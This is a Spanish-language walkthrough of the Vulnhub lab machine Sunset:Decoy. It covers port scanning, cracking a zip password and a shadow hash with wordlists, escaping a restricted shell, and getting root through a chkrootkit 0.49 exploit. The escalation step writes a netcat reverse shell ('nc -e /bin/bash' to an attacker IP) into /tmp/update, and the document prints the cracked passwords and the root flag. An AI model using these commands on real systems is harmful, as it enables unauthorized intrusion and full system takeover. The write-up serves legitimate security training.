[VLN] Sunset:Decoy

Hoy vamos a hackear la maquina de Vulnhub llamada Sunset:Decoy. Podeis descargarla desde el siguiente enlace: Sunset-Decoy

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~> nmap -A -p- 192.168.1.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 10:09 CEST
Nmap scan report for 60832e9f188106ec5bcc4eb7709ce592.home (192.168.1.123)
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
|   256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_  256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open  http    Apache httpd 2.4.38
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.0K  2020-07-07 16:36  save.zip
|_
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.19 seconds
Si visitamos la pagina web http://192.168.1.123 vemos que podemos descargar el fichero save.zip. Lo descargamos.

~/ctf/vulnhub/decoy > wget http://192.168.1.123/save.zip
--2020-07-10 10:12:52--  http://192.168.1.123/save.zip
Conectando con 192.168.1.123:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 3123 (3,0K) [application/zip]
Grabando a: “save.zipâ€

save.zip              100%[=========================>]   3,05K  --.-KB/s    en 
0s      

2020-07-10 10:12:52 (712 MB/s) - “save.zip†guardado [3123/3123]
Al tratar de descomprimirlo, vemos que esta protegido con password. Usamos fcrackzip y el diccionario rockyou para crackear el password.

~/ctf/vulnhub/decoy > fcrackzip -u -v -D -p /home/sml/rockyou.txt save.zip    
       5s
found file 'etc/passwd', (size cp/uc    668/  1807, flags 9, chk 90ab)
found file 'etc/shadow', (size cp/uc    434/  1111, flags 9, chk 834f)
found file 'etc/group', (size cp/uc    460/   829, flags 9, chk 8d07)
found file 'etc/sudoers', (size cp/uc    368/   669, flags 9, chk 1535)
found file 'etc/hosts', (size cp/uc    140/   185, flags 9, chk 8759)
found file 'etc/hostname', (size cp/uc     45/    33, flags 9, chk 8ce8)

PASSWORD FOUND!!!!: pw == manuel
Descomprimimos el fichero con la password que hemos crackeado (manuel).

~/ctf/vulnhub/decoy > unzip save.zip
group
hostname
hosts 
passwd  
shadow 
sudoers
Del fichero shadow, extraemos el ultimo usuario con su "hash/password" y lo guardamos en el fichero tocrack.txt

~/ctf/vulnhub/decoy > nano tocrack.txt
#contenido 
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7
x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.
Crackeamos la password con john y el diccionario rockyou.

~/ctf/vulnhub/decoy > sudo /usr/sbin/john tocrack.txt 
--wordlist=/home/sml/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
server           (96640a3b825115a47b68fc44501c828)
1g 0:00:00:05 DONE (2020-07-10 10:19) 0.1763g/s 3025p/s 3025c/s 3025C/s 
felton..Hunter
Use the "--show" option to display all of the cracked passwords reliably
Session completed
La password es "server". Nos logueamos por ssh :)

Low Shell



~/ctf/vulnhub/decoy/etc > ssh 296640a3b825115a47b68fc44501c828@192.168.1.123
The authenticity of host '192.168.1.123 (192.168.1.123)' can't be established.
ECDSA key fingerprint is SHA256:XcSxTQWk9o60DynaXNIL8HbB93NqEyqofs1B2EORdEE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.123' (ECDSA) to the list of known hosts.
296640a3b825115a47b68fc44501c828@192.168.1.123's password: 
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 
4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul  7 16:45:50 2020 from 192.168.1.162
-rbash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$
Al loguearnos vemos que tenemos una "restricted shell". Para escapar de ella nos logueamos de la siguiente forma:

~/ctf/vulnhub/decoy/etc > ssh 296640a3b825115a47b68fc44501c828@192.168.1.123 
"bash --noprofile"
296640a3b825115a47b68fc44501c828@192.168.1.123's password: 
python3 -c 'import pty; pty.spawn("/bin/bash")'
Exportamos el PATH para tener un PATH menos limitado.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ export 
PATH=/bin:usr/bin:$PATH
Exploramos la carpeta de nuestro usuario.

<1c828@60832e9f188106ec5bcc4eb7709ce592:~$ cd SV-502                 
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ ls
<1c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ ls                        
fich  logs
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ cd 
logs
<@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ cd logs                        
<28@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ ls
log.txt
<28@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ cat log	
---- SNIP ----
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
2020/06/27 18:56:57 CMD: UID=1000 PID=7645   | php -S 0.0.0.0:8080 
2020/06/27 18:56:57 CMD: UID=0    PID=6      | 
2020/06/27 18:56:57 CMD: UID=0    PID=222    | /lib/systemd/systemd-journald 
2020/06/27 18:56:57 CMD: UID=0    PID=10     | 
2020/06/27 18:56:57 CMD: UID=0    PID=1      | /sbin/init 
2020/06/27 18:56:58 CMD: UID=0    PID=12385  | -bash 
2020/06/27 18:56:58 CMD: UID=0    PID=12386  | tar -xvzf chkrootkit-0.49.tar.gz 
2020/06/27 18:57:07 CMD: UID=0    PID=12402  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12403  | -bash 
Exiting program... (interrupt)

---- SNIP ----
Podemos ver que posiblemente este usando chkrootkit-0.49. Si buscamos en google, vemos que hay un exploit[1] para esa version.

Privilege Escalation


Siguiendo los pasos, creamos el fichero "/tmp/update" para que ejecute una reverse shell.

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ echo 
"nc -e /bin/bash 192.168.1.111 7777" > update 
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ cat 
update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ chmod 
+x update
Ponemos nc a la escucha.

~ > nc -nlvp 7777
listening on [any] 7777 ...
Por ultimo, ejecutamos el programa honeypot.decoy que se encuentra en nuestra home y seleccionamos la opcion 5, para que lance el chkrootkit.

<0832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy                 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.

Option selected:5
5

The AV Scan will be launched in a minute or less.
--------------------------------------------------
Al rato... obtenemos la shell de root! :)

~ > nc -nlvp 7777
listening on [any] 7777 ...
connect to [192.168.1.111] from (UNKNOWN) [192.168.1.123] 54282
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@60832e9f188106ec5bcc4eb7709ce592:~# id
id
uid=0(root) gid=0(root) groups=0(root)

root.txt



root@60832e9f188106ec5bcc4eb7709ce592:~# cat root.txt
cat root.txt
  ........::::::::::::..           .......|...............::::::::........
     .:::::;;;;;;;;;;;:::::.... .     \   | ../....::::;;;;:::::.......
         .       ...........   / \\_   \  |  /     ......  .     ........./\
...:::../\\_  ......     ..._/'   \\\_  \###/   /\_    .../ \_.......   _//
.::::./   \\\ _   .../\    /'      \\\\#######//   \/\   //   \_   ....////
    _/      \\\\   _/ \\\ /  x       \\\\###////      \////     \__  _/////
  ./   x       \\\/     \/ x X           \//////                   \/////
 /     XxX     \\/         XxX X                                    ////   x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
       X        _X      *    X      **         **             x   **    *  X
      _X                    _X           x                *          x     X_


1c203242ab4b4509233ca210d50d2cc5

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

End


Y con esto ya seriamos root de la maquina :) [1] https://www.exploit-db.com/exploits/33899